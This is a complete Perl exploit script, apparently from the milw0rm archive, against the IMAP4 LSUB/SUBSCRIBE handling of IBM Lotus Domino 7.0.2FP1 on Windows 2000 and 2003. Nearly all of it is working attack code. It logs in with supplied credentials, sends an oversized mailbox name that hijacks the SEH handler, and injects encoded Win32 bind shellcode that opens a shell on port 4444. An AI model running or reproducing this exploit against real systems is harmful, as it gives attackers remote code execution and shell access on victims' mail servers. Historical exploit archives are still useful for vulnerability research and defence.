#!perl
#
# "IBM Lotus Domino" IMAP4 Server 'LSUB' Command Exploit
#
# Author: Manuel Santamarina Suarez
# e-Mail: FistFuXXer@gmx.de
#
use IO::Socket;
use File::Basename;
#
# destination TCP port
#
$port = 143;
#
# SE handler
#
# You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters)
# You must use a POP/POP/RET sequence that doesn't modify the ESP register or
# the shellcode decoder will fail.
#
$seh = reverse( "\x60\x21\x53\x4E" ); # POP EDI/POP EBP/RET
# nnotes.6021534e
# universal on Lotus Domino 7.0.2FP1
#
# Shellcode
# You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters)
#
# 1. Step: Modified Win32 Bind Shellcode (EXITFUNC=thread, LPORT=4444)
# 2. Step: Encoded with Alpha 2.0 (BASEADDRESS=ESP)
#
$sc = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIeyZiMSKYnPYI".
"JNJy0tGTydqKOqcCDS2wDWLMnzmSxkYlkRYdLksMRFhWoOZNbRe5mxBWuVHvqcFS".
"7vIORKmLzQmOToWf3RvqWhTOUViUD7Wfqvn3yLusEVmKMiuvBmuSkKNsrmzNpPhV".
"bgOgpVIEsVRNpl2cOYnRDbl26fJePsR6cVkLKlUKO6TQWx6kLLpqRtGKVftSekP3".
"OaKKlTgVV6KNyLqDoMtQB75KWvJJ0KoJGvzzSog9M5ftwiwisQkzMxiQXkyYDqqo".
"ONy8uocPKNMxUX2crRPJWOKlsPavRLQWQbPLs8MNphKLZvXznenx5RamlOQumWQo".
"btLSI2OJYJe5mQ0DyNyY7tctxNJiR4pDcBpJUaCOmLo6uaPDVdcKyRSOUyOpewzp".
"ZzPeMQSMmMZkdBkXaMZRl3lzLcBSUPM8skzitBixQMibMbaNfkXSWp9xSkzjUSRc".
"hX2EMWOt8eQmdn8QJTHMNHIQKhpemWRQYwkNvQSOXnL7yN9bXgiZfnGNQQUClp3M".
"HIECH5WVPM59KMkYZolwliSeoQwyJzBMH5FQYlMlJEHhLiLdOkQu5rpS2RrltL70".
"YO8KFfqVm7mKtFcvxXzkoXKwxe6WLNuB3sYYY8kqm73UlhEp0rQZKl1PbQDYOcPs".
"RRRlfem8aMibLxKi0mij5TKXQKcUk76wlMLZA";
#
# JUMP to 'ESP adjustment' and shellcode
#
$jmp = "\x74\x20". # JE SHORT
"\x75\x20"; # JNZ SHORT
#
#
# Don't edit anything after this line
#
#
$sc_limit = 2300;
sub usage {
print "Usage: " . basename( $0 ) . " [target] [IPv4 address] [username] [password]\n".
"Example: ". basename( $0 ) . " 1 192.168.1.19 \"Bill Gates/ServerName\" \"P4ssw0rd\"\n".
"\n".
"Targets:\n".
"[1] Lotus Domino 7.0.2FP1 on Windows Server 2000 SP4\n".
"[2] Lotus Domino 7.0.2FP1 on Windows Server 2003 SP2\n";
exit;
}
# Net::IP::ip_is_ipv4
sub ip_is_ipv4 {
my $ip = shift;
unless ($ip =~ m/^[\d\.]+$/) {
return 0;
}
if ($ip =~ m/^\./) {
return 0;
}
if ($ip =~ m/\.$/) {
return 0;
}
if ($ip =~ m/^(\d+)$/ and $1 < 256) {
return 1
}
my $n = ($ip =~ tr/\./\./);
unless ($n >= 0 and $n < 4) {
return 0;
}
if ($ip =~ m/\.\./) {
return 0;
}
foreach (split /\./, $ip) {
unless ($_ >= 0 and $_ < 256) {
return 0;
}
}
return 1;
}
print "--------------------------------------------------------\n".
' "IBM Lotus Domino" IMAP4 Server \'LSUB\' Command Exploit'."\n".
"--------------------------------------------------------\n\n";
if( ($#ARGV+1) != 4 ) {
&usage;
}
$user = $ARGV[2];
$pass = $ARGV[3];
# Windows 2000 SP4
if( $ARGV[0] == 1 ) {
$popad = "\x41" x 3 . # INC ECX
"\x61" x 51; # POPAD
}
# Windows 2003 SP2
elsif( $ARGV[0] == 2 ) {
$popad = "\x41" x 2 . # INC ECX
"\x61" x 52; # POPAD
}
else {
&usage;
}
if( ip_is_ipv4( $ARGV[1] ) ) {
$ip = $ARGV[1];
}
else
{
&usage;
}
if( length( $sc ) > $sc_limit ) {
print "[-] Error: Shellcode's size exceeds $sc_limit bytes!\n";
exit;
}
print "[+] Connecting to $ip:$port...\n";
$sock = IO::Socket::INET->new (
PeerAddr => $ip,
PeerPort => $port,
Proto => 'tcp',
Timeout => 2
) or print "[-] Error: Couldn't establish a connection to $ip:$port!\n" and exit;
print "[+] Connected.\n";
$mailbox = "\x44" x 280 . $jmp . $seh . "\x44" x 26 . $popad . $sc . "\x44" x 3000;
$sock->recv( $recv, 1024 );
$sock->send( "a001 LOGIN \"$user\" \"$pass\"\r\n" );
$sock->recv( $recv, 1024 );
if( $recv ne "a001 OK LOGIN completed\r\n" ) {
print "[-] Error: Invalid username or password!\n";
exit;
}
print "[+] Successfully logged in.\n".
"[+] Trying to overwrite and control the SE handler...\n";
$sock->send( "a002 SUBSCRIBE {" . length( $mailbox ) . "}\r\n" );
$sock->recv( $recv, 1024 );
$sock->send( "$mailbox\r\n" );
$sock->recv( $recv, 1024 );
$sock->send( "a003 LSUB arg1 arg2\r\n" );
sleep( 3 );
close( $sock );
print "[+] Done. Now check for a bind shell on $ip:4444!\n";
# milw0rm.com [2007-10-27]